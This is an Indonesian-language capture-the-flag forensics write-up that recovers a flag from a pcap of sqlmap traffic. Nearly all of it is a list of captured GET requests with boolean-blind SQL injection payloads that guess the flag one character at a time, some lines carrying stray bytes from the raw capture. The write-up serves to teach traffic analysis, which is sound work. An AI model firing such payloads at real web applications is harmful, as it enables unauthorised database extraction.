SQLMAP - 125 Points

sqlmap.pcap

POC

Dari file pcap tersebut kita menggunakan strings | grep SELECT Kemudian semuanya kita copy ke online urldecode agar lebih mudah untuk di baca dan setelah itu kita buat bagian2 yang tidak perlu seperti ketika enum nama database/kolom mencari panjang karakter/dsb kita hanya mengambil pada saat dump flag dataclean

Table : flag Kolom : flag Database : loki

GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>68 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>70 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>71 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>68 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>70 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>69 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>76 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>78 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>77 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>68 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>66 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>65 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>84 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>82 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>83 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>84 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>82 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>83 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>76 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>74 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>73 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>76 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>74 AND '%'='HTTP/1.1b
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>75 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>124 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>122 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>123 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>104 AND '%'='HTTP/1.1b
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>108 AND '%'='HTTP/1.1b!
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>106 AND '%'='HTTP/1.1b$
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>107 AND '%'='HTTP/1.1b$
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>64 AND '%'='HTTP/1.1b'
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>96 AND '%'='HTTP/1.1b'
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>112 AND '%'='HTTP/1.1b*
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>104 AND '%'='HTTP/1.1b-
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>108 AND '%'='HTTP/1.1b/
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>110 AND '%'='HTTP/1.1b/
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>109 AND '%'='HTTP/1.1b2
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>64 AND '%'='HTTP/1.1b4
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>96 AND '%'='HTTP/1.1b4
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>112 AND '%'='HTTP/1.1b8
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>104 AND '%'='HTTP/1.1b8
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>108 AND '%'='HTTP/1.1b<
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>110 AND '%'='HTTP/1.1b>
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>111 AND '%'='HTTP/1.1b?
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>64 AND '%'='HTTP/1.1bA
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>96 AND '%'='HTTP/1.1bB
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>112 AND '%'='HTTP/1.1bE
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>120 AND '%'='HTTP/1.1bG
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>116 AND '%'='HTTP/1.1bI
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>118 AND '%'='HTTP/1.1bI
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>119 AND '%'='HTTP/1.1bL
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>64 AND '%'='HTTP/1.1bO
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>96 AND '%'='HTTP/1.1bP
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>80 AND '%'='HTTP/1.1bP
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>88 AND '%'='HTTP/1.1bT
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>92 AND '%'='HTTP/1.1bT
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>94 AND '%'='HTTP/1.1bW
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>95 AND '%'='HTTP/1.1bZ
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>64 AND '%'='HTTP/1.1b[
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>96 AND '%'='HTTP/1.1b^
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>112 AND '%'='HTTP/1.1b^
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>120 AND '%'='HTTP/1.1ba
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>116 AND '%'='HTTP/1.1bb
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>114 AND '%'='HTTP/1.1be
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>115 AND '%'='HTTP/1.1bf
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>64 AND '%'='HTTP/1.1bi
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>96 AND '%'='HTTP/1.1bi
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>112 AND '%'='HTTP/1.1bl
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>104 AND '%'='HTTP/1.1bl
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>100 AND '%'='HTTP/1.1bp
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>102 AND '%'='HTTP/1.1br
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>103 AND '%'='HTTP/1.1bt
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>64 AND '%'='HTTP/1.1bt
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>96 AND '%'='HTTP/1.1bx
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>112 AND '%'='HTTP/1.1bx
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>104 AND '%'='HTTP/1.1b{
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>100 AND '%'='HTTP/1.1b{
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>102 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>101 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>92 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>94 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>95 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>98 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>99 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>108 AND '%'='HTTP/1.1
